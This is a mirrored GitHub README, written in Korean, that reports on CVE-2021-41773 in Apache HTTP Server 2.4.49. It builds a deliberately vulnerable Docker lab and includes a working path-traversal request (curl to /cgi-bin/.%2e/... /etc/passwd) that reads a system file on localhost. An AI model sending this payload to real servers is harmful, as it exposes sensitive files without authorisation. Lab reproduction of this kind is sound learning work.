CVE-2021-41773 PoC — Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49

Source

https://github.com/JIYUN02/cve-2021-41773

Associated Vulnerability

Title:Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)
Description:A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.

Readme

# CVE-2021-41773 – Apache Path Traversal 보고서

---
## 요약
- Apache HTTP Server 2.4.49 버전에서 발견된 취약점으로, 웹 서버 설정에 따라 Path Traversal 공격을 통해 시스템의 민감한 파일을 노출할 수 있음
- Path Traversal: 공격자가 ../ 을 포함한 경로를 사용하여 웹 루트 밖의 파일에 접근할 수 있음

---
## 정보
- **취약점 이름**: CVE-2021-41773
- **영향받는 버전**: Apache HTTP Server 2.4.49
- **취약점 유형**: Path Traversal 
- **공식 패치 여부**: 2.4.50 이상에서 패치됨

---
## 실습 환경 구성
- Base Image : 'httpd:2.4.49' (DockerHub)
- 컨테이너 구동 방식 : Dockerfile + docker-compose.yml
- 실행 포트 : 8080 → 컨테이너의 80포트로 연결
- Apache 설정 변경 : 'Require all granted'로 수정 (Path Traversal 가능하게 함)

---
## 환경 실행 방법
- git clone https://github.com/JIYUN02/cve-2021-41773.git
- cd cve-2021-41773
- docker-compose up --build

---
## 취약점 PoC
- curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

---
## 상세 과정
1. 과제를 위한 디렉터리 실행
<img width="560" alt="image" src="https://github.com/user-attachments/assets/49645e97-75fc-4210-9d03-17f814e22138" />
<img width="561" alt="image" src="https://github.com/user-attachments/assets/a386852c-08f6-4d40-85e0-dfc061b53c23" />

2. Dockerfile 제작
<img width="576" alt="image" src="https://github.com/user-attachments/assets/9fa8e776-ed89-434a-a935-cd99bfc77dbb" />

-> Base Image: httpd:2.4.49 (취약점이 존재하는 버전)

-> 'sed -i 's/Require all denied/Require all granted/g' : Path Traversal 허용 및 외부 접근

3. docker-compose.yml
<img width="219" alt="image" src="https://github.com/user-attachments/assets/468f1203-30a4-4834-8823-e45b29a42bbf" />

-> Apache 정의

-> 8080 포트를 컨테이너의 80 포트로 매핑

4. docker 실행
<img width="559" alt="image" src="https://github.com/user-attachments/assets/39e2b358-01e8-4570-9c3b-6d248bff3420" />

5. PoC 실행
<img width="561" alt="image" src="https://github.com/user-attachments/assets/c7f988d4-263f-49f6-9175-7b58ca2a3a5a" />

-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

-> /etc/passwd는 민감한 정보를 담고 있음, %2e는 ..의 인코딩된 단어이며 이는 상위 디렉터리로 이동하는 명령

-> 경로를 조작하여 서버가 /etc/passwd에 접근하고 이를 출력하도록 함

7. 실행 결과
<img width="566" alt="image" src="https://github.com/user-attachments/assets/3e2bf503-25b7-4ec0-ab8c-a17d069c2397" />

-> 상기 이미지와 같이 민감한 디렉터리에 접근 가능

---
##  Fork를 통해 접근 가능한 레포지토리 URL
https://github.com/JIYUN02/cve-2021-41773

-> 커밋 이력 존재

File Snapshot


 [4.0K]  /data/pocs/d76435df44e64ece9f405e7f22e3db1c1d8b2c83
├── [  76]  docker-compose.yml
├── [ 226]  Dockerfile
└── [2.8K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!